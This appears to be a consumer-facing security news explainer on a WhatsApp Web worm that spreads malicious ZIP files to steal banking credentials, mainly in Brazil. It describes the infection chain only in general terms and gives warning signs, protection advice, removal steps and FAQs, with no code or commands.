A new WhatsApp worm is infecting users by sending fake ZIP attachments that contain hidden malware designed to steal banking credentials. Once opened, it spreads automatically through the victim’s contacts, targeting Windows systems via WhatsApp Web. The campaign has hit users in Brazil the hardest, but experts warn it could spread globally.

A New Wave of Malware Targeting WhatsApp Users

Security researchers have uncovered a new WhatsApp worm banking malware campaign that tricks users into downloading and running infected ZIP files. Once the file is opened, the malware silently installs a banking trojan that steals login credentials, browser cookies, and session tokens.

The worm spreads by abusing WhatsApp Web sessions, sending the same malicious ZIP file to all contacts in the victim’s chat list. This method gives the campaign viral reach, using social trust to make the message look legitimate.

Researchers say the attack has been active since late September 2025 and primarily targets users in Brazil, though the infection technique could easily be reused elsewhere.

How the WhatsApp Worm Banking Malware Works

This campaign combines social engineering with automated propagation, making it especially dangerous. Here’s the breakdown:

1. Malicious ZIP arrives via WhatsApp.
   The victim receives a ZIP file from a known contact through WhatsApp Web. The file is usually disguised as a receipt, invoice, or software update. Because it comes from a familiar name, users are more likely to trust it.
2. Hidden payload inside.
   Inside the ZIP, a Windows shortcut (.lnk) or executable (.exe) file appears harmless but launches hidden PowerShell commands once opened.
3. Downloader stage activates.
   The script connects to a remote server controlled by attackers and downloads additional payloads. These may include banking trojans, credential stealers, or spyware modules.
4. Credential theft and session hijacking.
   The malware collects data from browsers, cookies, and saved passwords. It also captures active banking sessions and authentication tokens.
5. Worm-like propagation.
   Using the compromised WhatsApp Web session, the malware automatically sends the same ZIP file to the victim’s contacts, continuing the infection chain.

This cycle repeats across networks and contacts, allowing the malware to spread faster than traditional phishing campaigns.

Timeline of the WhatsApp Worm Banking Malware Incident

The WhatsApp worm banking malware campaign unfolded quickly over just two weeks, moving from isolated detections to widespread infections. Security firms tracked its evolution through a series of key milestones that show how fast the threat grew and how researchers responded. The timeline below highlights the major events that shaped this incident.

Why This Attack Works So Well

The success of this malware lies in social engineering and automation. People are naturally inclined to trust messages from friends and coworkers. Attackers exploit that by hijacking trusted chats to deliver malware.

Why This Attack Works So Well

The WhatsApp worm banking malware is effective because it blends psychological manipulation, automation, and familiarity. It doesn’t rely on sophisticated exploits or zero-day vulnerabilities. Instead, it preys on how people naturally communicate and trust others online.

1. It uses social proof

Humans are wired to trust messages from people they know. When the malware sends a ZIP file from a familiar contact, users don’t question its authenticity. The attacker doesn’t need to craft convincing phishing emails or fake domains. A simple “check this out” message from a friend or coworker is enough to trigger curiosity.

2. It blurs personal and professional boundaries

Many professionals now use WhatsApp for work updates, document sharing, and team discussions. That crossover between personal and business communication gives attackers a perfect entry point. What begins as a harmless-looking chat can quickly turn into a corporate breach if opened on a work laptop.

3. It hides behind legitimate sessions

The worm doesn’t break into WhatsApp servers. Instead, it hijacks WhatsApp Web sessions that users have already authenticated. Since the malware acts within a legitimate, logged-in browser, it avoids raising alarms and bypasses security filters that usually monitor external traffic.

4. It automates the spread

Once the device is infected, the malware automatically sends itself to all the victim’s contacts. This self-propagating design removes the need for manual effort from the attacker. It’s fast, scalable, and difficult to contain. Even cautious users might click if they see the same file coming from multiple trusted contacts.

5. It exploits user habits

Most users rarely verify attachments before opening them. They assume that a file from a known person is safe. Attackers know this and design the file names to look routine — something like invoice_2025.zip or photo_album.zip. The sense of urgency or familiarity makes users act first and think later.

6. It evades detection for longer

Because the messages and attachments come from legitimate accounts, many security tools initially mark them as safe. Traditional spam filters don’t monitor WhatsApp traffic, and endpoint defenses may not flag ZIP files until they’re executed. This gives the worm more time to move laterally and collect data.

7. It targets global behavior

The attack model isn’t limited to Brazil or any specific region. It works anywhere WhatsApp is used for personal or work communication — which is nearly everywhere. The reliance on trust and convenience gives it universal appeal for cybercriminals and makes it hard for users to defend against.

In short, this attack succeeds because it turns human trust into a weapon. It doesn’t need advanced exploits or complex malware to succeed; it just needs people to click.

Who Is Affected

The WhatsApp worm banking malware primarily targets Windows users who use WhatsApp Web, but the actual impact goes far beyond individual users.

In Brazil, several organizations including financial institutions, small businesses, and government offices have already reported infections. The campaign takes advantage of how employees casually use personal messaging apps on office systems, which allows the worm to slip past traditional network defenses.

Once a single system is compromised, the malware can:

• Spread laterally within local networks by accessing shared folders or cached credentials.
  
• Harvest stored banking logins, browser cookies, and session tokens, which can be used to access enterprise dashboards or payment gateways.
  
• Send malicious ZIPs to business or personal contacts, turning victims into unwilling distributors.
  

Researchers warn that this hybrid targeting approach, blending personal and enterprise attack surfaces, could soon appear outside Latin America. Countries with large WhatsApp user bases like India, Indonesia, and Mexico may be next.

Essentially, anyone using WhatsApp Web on a desktop or laptop without strict attachment controls is at risk. The overlap between personal and professional communication gives attackers an easy opening.

Why WhatsApp Is a Target

WhatsApp is one of the world’s most widely used messaging platforms, with over 2.7 billion active users. It has become a default channel for both personal and business communication, making it a valuable target for cybercriminals.

Attackers know users inherently trust contacts they know, especially in familiar chat threads. A message from a colleague or family member carrying a ZIP file doesn’t raise suspicion the way a random phishing email might. That sense of trust is exactly what attackers exploit.

The WhatsApp Web interface also adds a technical opportunity. Many users stay logged in for convenience, and messages sync automatically with their desktop browsers. This means malware doesn’t have to exploit a WhatsApp vulnerability; it simply hijacks the session and uses automation to send new messages that look like legitimate conversations.

From a cybercriminal’s point of view, the platform’s reach, speed, and trust factor make it an ideal channel for mass distribution. The worm spreads through real conversations, which helps it stay undetected longer and spread faster than traditional email-based attacks.

WhatsApp’s cross-device sync also blurs the line between work and personal use. Attackers take advantage of this to steal both corporate credentials and personal banking information in a single strike.

Signs You May Be Infected

If you suspect you’ve been exposed to this attack, look for these red flags:

• You received and opened a suspicious ZIP file from WhatsApp.
  
• Your WhatsApp contacts report receiving strange messages from you.
  
• Your system shows unusual PowerShell activity or creates new scheduled tasks.
  
• Your browser logs you out of accounts unexpectedly.
  
• You notice unauthorized transactions in banking or payment apps.
  

If you see any of these, disconnect from the internet immediately and run a full malware scan.

How to Protect Yourself

For regular users

• Don’t open ZIP files or attachments from chats unless you’re sure of the source. Always confirm by calling the sender.
  
• Avoid running .lnk or .exe files from WhatsApp or email attachments.
  
• Update Windows and browsers regularly to patch known vulnerabilities.
  
• Use multi-factor authentication (MFA) for banking and social apps.
  
• Install a trusted antivirus or endpoint security tool.
  

Steps for Removal and Recovery

If your device is already infected:

1. Disconnect from Wi-Fi or LAN immediately.
   
2. Run a full scan using updated antivirus or EDR software.
   
3. Check for and delete any unknown startup items or scheduled tasks.
   
4. Change all passwords, especially for banking and email accounts.
   
5. Inform your bank if you suspect financial compromise.
   
6. Reinstall Windows from a clean backup if necessary.
   

FAQs

Q1: Is this a vulnerability in WhatsApp?
No, the malware doesn’t exploit a flaw in WhatsApp. It takes advantage of user trust and WhatsApp Web sessions to spread malicious files.

Q2: Can Android or iPhone users be affected?
The current wave mainly targets Windows systems through WhatsApp Web. However, attackers could adapt it to mobile platforms in future variants.

Q3: What should I do if I opened the ZIP file?
Disconnect your device from the internet, run a full antivirus or EDR scan, and change all important passwords immediately. Inform your bank if you use online banking.

Q4: How does the worm spread so fast?
Once infected, the malware automatically sends itself to all contacts through the victim’s WhatsApp Web session. It uses trusted relationships to propagate quickly.

Q5: How can businesses protect themselves?
Organizations should monitor network traffic for suspicious PowerShell commands, limit WhatsApp Web usage on work devices, and block risky file types.

Q6: Can antivirus tools detect it?
Most updated antivirus and EDR solutions can detect related payloads. However, early-stage variants may still evade detection, so behavioral monitoring is essential.

Conclusion

The WhatsApp worm banking malware shows how easily social engineering and automation can merge into a powerful threat. It proves that even trusted platforms can become attack channels when users let their guard down. Staying safe means questioning unexpected attachments, maintaining regular software updates, and using layered security. Cyber awareness, not just antivirus tools, is the strongest defense against such evolving threats.